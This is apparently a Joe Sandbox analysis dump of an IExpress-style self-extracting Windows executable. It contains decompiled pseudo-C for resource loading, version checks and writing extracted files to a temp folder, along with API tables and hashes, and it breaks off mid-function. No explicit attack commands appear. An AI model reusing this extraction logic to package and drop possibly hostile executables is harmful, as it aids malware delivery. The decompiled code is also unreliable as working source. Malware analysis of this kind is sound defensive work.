                                                                        			E00A328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00A32773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}

































                                                                        0x00a328f1
                                                                        0x00a328f4
                                                                        0x00a328f7
                                                                        0x00a328f9
                                                                        0x00a328fc
                                                                        0x00a328ff
                                                                        0x00a32901
                                                                        0x00a32907
                                                                        0x00a32a62
                                                                        0x00a32a64
                                                                        0x00a3290d
                                                                        0x00a3290d
                                                                        0x00a3290f
                                                                        0x00a32912
                                                                        0x00a32920
                                                                        0x00a32937
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32944
                                                                        0x00a3294a
                                                                        0x00a3294f
                                                                        0x00a32a2f
                                                                        0x00a32a32
                                                                        0x00a32a34
                                                                        0x00a32a37
                                                                        0x00a32a41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32955
                                                                        0x00a3295e
                                                                        0x00a32962
                                                                        0x00a32969
                                                                        0x00a3296f
                                                                        0x00a32974
                                                                        0x00a3298c
                                                                        0x00a32a20
                                                                        0x00a32a21
                                                                        0x00a32a27
                                                                        0x00a32a4c
                                                                        0x00a32a4f
                                                                        0x00a32a50
                                                                        0x00a32a53
                                                                        0x00a32a56
                                                                        0x00a32a5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a329b2
                                                                        0x00a329b2
                                                                        0x00a329b5
                                                                        0x00a329bd
                                                                        0x00a329c3
                                                                        0x00a329cc
                                                                        0x00a329d5
                                                                        0x00a329d7
                                                                        0x00a329da
                                                                        0x00a329dd
                                                                        0x00a329df
                                                                        0x00a329ec
                                                                        0x00a329f8
                                                                        0x00a329fc
                                                                        0x00a329ff
                                                                        0x00a32a02
                                                                        0x00a32a07
                                                                        0x00a32a0a
                                                                        0x00a32a0f
                                                                        0x00a32a19
                                                                        0x00a32a81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32a0f
                                                                        0x00a3298c
                                                                        0x00a32974
                                                                        0x00a32962
                                                                        0x00000000
                                                                        0x00a3294f
                                                                        0x00a32912
                                                                        0x00a32a65
                                                                        0x00a32a68
                                                                        0x00a32a6c
                                                                        0x00a32a6f
                                                                        0x00a32a6f
                                                                        0x00a32a7d

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00A32A6F
                                                                          • Part of subcall function 00A32773: CharUpperA.USER32(B6B6972C,00000000,00000000,00000000), ref: 00A327A8
                                                                          • Part of subcall function 00A32773: CharNextA.USER32(0000054D), ref: 00A327B5
                                                                          • Part of subcall function 00A32773: CharNextA.USER32(00000000), ref: 00A327BC
                                                                          • Part of subcall function 00A32773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32829
                                                                          • Part of subcall function 00A32773: RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32852
                                                                          • Part of subcall function 00A32773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32870
                                                                          • Part of subcall function 00A32773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A328A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A33938,?,?,?,?,-00000005), ref: 00A32958
                                                                        • GlobalLock.KERNEL32 ref: 00A32969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A33938,?,?,?,?,-00000005,?), ref: 00A32A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A32A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: 06fe922ef1f525ef540a08a3059daac772533c012e7d063f5f3f5cc6e3f36a4c
                                                                        • Instruction ID: dfb38c5f279c101ee447db892a36adbac6d5faedf54521f0a23d5d771ecc4651
                                                                        • Opcode Fuzzy Hash: 06fe922ef1f525ef540a08a3059daac772533c012e7d063f5f3f5cc6e3f36a4c
                                                                        • Instruction Fuzzy Hash: F5512831E00219EBCB25CF98DD84AAEBBB9FF48740F14402AF945E3221DB319941DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00A34169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00A3468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00A3468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00A344B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}





                                                                        0x00a3417d
                                                                        0x00a3418f
                                                                        0x00a34193
                                                                        0x00a341b7
                                                                        0x00a341d3
                                                                        0x00a341e6
                                                                        0x00000000
                                                                        0x00a341e7
                                                                        0x00a341d5
                                                                        0x00a341d6
                                                                        0x00a341d8
                                                                        0x00a341d9
                                                                        0x00a341da
                                                                        0x00a341df
                                                                        0x00a341e1
                                                                        0x00000000
                                                                        0x00a341e1
                                                                        0x00a341b9
                                                                        0x00a341ba
                                                                        0x00a341bc
                                                                        0x00a341bd
                                                                        0x00a341be
                                                                        0x00000000
                                                                        0x00a341be
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A330B4), ref: 00A34189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A330B4), ref: 00A341E7
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: b9499f3465dbe69cbd961561d3e3c2868cc7926eff187161f1a536ea23c88be4
                                                                        • Instruction ID: 05400f152ba3877477f2a00e0361547e1da3d9f419037614149cf76f2b5be482
                                                                        • Opcode Fuzzy Hash: b9499f3465dbe69cbd961561d3e3c2868cc7926eff187161f1a536ea23c88be4
                                                                        • Instruction Fuzzy Hash: 1501FFB1300B243BF3282BA54C86F7B618EDBE9795F004235B746E21809AA8EC4241B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00A343D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xa39a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}













                                                                        0x00a319e0
                                                                        0x00a319e0
                                                                        0x00a319eb
                                                                        0x00a319f2
                                                                        0x00a319f9
                                                                        0x00a319fc
                                                                        0x00a31a01
                                                                        0x00a31a2a
                                                                        0x00a31a2e
                                                                        0x00a31a3e
                                                                        0x00a31a4f
                                                                        0x00a31a62
                                                                        0x00a31a6a
                                                                        0x00000000
                                                                        0x00a31a03
                                                                        0x00a31a06
                                                                        0x00a31a20
                                                                        0x00a31a20
                                                                        0x00a31a08
                                                                        0x00a31a08
                                                                        0x00a31a14
                                                                        0x00000000
                                                                        0x00a31a16
                                                                        0x00a31a18
                                                                        0x00a31a70
                                                                        0x00a31a72
                                                                        0x00a31a72
                                                                        0x00a31a14
                                                                        0x00a31a06
                                                                        0x00a31a81

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00A31A18
                                                                        • GetDesktopWindow.USER32 ref: 00A31A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00A31A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A31A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00A31A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 1a1704f1bcb832c251d032adec412fafef0a5ac74eacb1794b675ecb38d713c2
                                                                        • Instruction ID: 835414770f0ab625744bd58557641e6453d61b3e3a34b1b9d161996856858a7f
                                                                        • Opcode Fuzzy Hash: 1a1704f1bcb832c251d032adec412fafef0a5ac74eacb1794b675ecb38d713c2
                                                                        • Instruction Fuzzy Hash: 9A11D631A01219AFDB10EFA4EE08AAE77B8FF59341F108254F952D7190DF349E02DB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00A363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00A31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				E00A3658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xa39124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xa39124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00A36CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}















                                                                        0x00a363cb
                                                                        0x00a363d2
                                                                        0x00a363d8
                                                                        0x00a363ea
                                                                        0x00a363f3
                                                                        0x00a36401
                                                                        0x00a36402
                                                                        0x00a36410
                                                                        0x00a36415
                                                                        0x00a36433
                                                                        0x00a36438
                                                                        0x00a36449
                                                                        0x00a36463
                                                                        0x00a3646d
                                                                        0x00a36477
                                                                        0x00a36477
                                                                        0x00a3647a
                                                                        0x00a3643a
                                                                        0x00a3643a
                                                                        0x00a36444
                                                                        0x00a36444
                                                                        0x00a36492

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A363EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 1065093856-1955631000
                                                                        • Opcode ID: 25903919ad7d9096d490c1e2779550cf209b55289f319a0c7c75007e7a4a69a9
                                                                        • Instruction ID: 8c970594722c4f2845c2fc72c8e9b241dd9a4cefa3e2bb47b19c4cc86f5ee467
                                                                        • Opcode Fuzzy Hash: 25903919ad7d9096d490c1e2779550cf209b55289f319a0c7c75007e7a4a69a9
                                                                        • Instruction Fuzzy Hash: 1721D271A00218ABDB10DF65DC85FEB737CEB55314F0042A9F595A3280DBB05D858FA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        0x00a3368c
                                                                        0x00a3368f
                                                                        0x00a33691
                                                                        0x00a3369f
                                                                        0x00a336a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a336ba
                                                                        0x00000000
                                                                        0x00a336bc
                                                                        0x00a336bc
                                                                        0x00a336c0
                                                                        0x00a336cb
                                                                        0x00a336c2
                                                                        0x00a336c4
                                                                        0x00a336c4
                                                                        0x00a336da
                                                                        0x00a336e0
                                                                        0x00a336e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a336e6
                                                                        0x00000000
                                                                        0x00a336ba
                                                                        0x00a336ed

                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A3369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336B2
                                                                        • DispatchMessageA.USER32(?), ref: 00A336CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 675689541d853be78f81a5fc2b613b3d459f80bb08f51d12967aeb22cca5be67
                                                                        • Instruction ID: 88de10d7dccbf8266f391e33e713d971de3812968ea6c7b42a0f7a4ccaddbde3
                                                                        • Opcode Fuzzy Hash: 675689541d853be78f81a5fc2b613b3d459f80bb08f51d12967aeb22cca5be67
                                                                        • Instruction Fuzzy Hash: 2A01A7739042247BDF308BE65C4DEEB767CEBC5B10F000219F905E2180D760C641C6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00A36517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xa39a3c; // 0xa30000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00A344B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}







                                                                        0x00a3651f
                                                                        0x00a3652a
                                                                        0x00a36534
                                                                        0x00a3656b
                                                                        0x00a36577
                                                                        0x00a3657c
                                                                        0x00a36536
                                                                        0x00a3653e
                                                                        0x00a36542
                                                                        0x00000000
                                                                        0x00a36544
                                                                        0x00a36547
                                                                        0x00a3654c
                                                                        0x00a36549
                                                                        0x00a36549
                                                                        0x00a36549
                                                                        0x00a3655e
                                                                        0x00a36560
                                                                        0x00a36569
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a36569
                                                                        0x00a36542
                                                                        0x00a36587

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                        • LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                        • DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: 7aaa74b917b3964d19332d5813aec858c011bbdf42499e2d432dae3064f56507
                                                                        • Instruction ID: 3d19b0ae68ba6a92df95ca613211058d5ee0c4cd5636b30814ce67220ed1dcd5
                                                                        • Opcode Fuzzy Hash: 7aaa74b917b3964d19332d5813aec858c011bbdf42499e2d432dae3064f56507
                                                                        • Instruction Fuzzy Hash: 53014972100615BBCB109FA9AC48DBB7A7CEB99360F004235FE50D3150D771CC11CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00A365E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
